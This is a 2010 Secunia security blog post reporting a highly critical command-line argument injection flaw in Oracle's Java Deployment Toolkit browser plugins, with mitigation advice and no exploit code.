Secunia CSI7
About us
Careers
Memberships
Newsroom
Contact us
Blog
News
Articles

Oracle Java Critical Vulnerability Affects Most Users

Get this blog as an RSS Feed
13:56 CET on the 12th April 2010
Entry written by Alin Rad Pop.

The JRE (Java Runtime Environment) update released by Oracle at the end of March covered 20 vulnerabilities, some of which were marked "Highly critical" by Secunia. You may have the feeling of your system being more secure after applying that update, but few users probably expected that another "Highly critical" vulnerability would become public soon after.

Today, Secunia issued SA39260. This advisory covers a vulnerability in a number of browser plugins installed by default with JRE, commonly termed the Java Deployment Toolkit. The vulnerability was independently reported by Tavis Ormandy and Ruben Santamarta; both providing good descriptions of the problem. Basically, a call to CreateProcessA() is issued by the Java Deployment Toolkit without sanitising command line arguments. This further allows injecting arbitrary JVM arguments and execute code in a privileged context, leading to a complete system compromise when visiting a web site.

This vulnerability is particularly interesting for an attacker as in-depth memory protection mechanisms on modern Windows operating systems such as DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization) provide no mitigation. Consequently, we expect to soon see attempts to exploit this vulnerability in the wild.

We hope that Oracle decides to provide an update soon. Meanwhile, Java users are recommended to delete or restrict access to all deployment plugins and set the kill-bit for affected ActiveX controls.

Stay Secure,

Alin Rad Pop,
Senior Security Specialist

Discuss this blog entry
A new thread in our forum is created. Activate the thread by commenting/discussing below.
Subject: Oracle Java Critical Vulnerability Affects Most Users
 
No posts yet

-

You must be logged in to post a comment.



 Products Solutions Customers Partner Resources Company
 
 Corporate
Vulnerability Intelligence Manager (VIM)
Corporate Software Inspector (CSI)
Consumer
Personal Software Inspector (PSI)
Online Software Inspector (OSI)
 Industry
Compliance
Technology
Integration
 Customers
Testimonials
 VARS
MSSP
Technology Partners
References
 Reports
Webinars
Events
 About us
Careers
Memberships
Newsroom


 
© 2002-2014 Secunia ApS - Rued Langgaards Vej 8, 4th floor, DK-2300 Copenhagen, Denmark - +45 7020 5144
Terms & Conditions and Copyright - Privacy - Report Vulnerability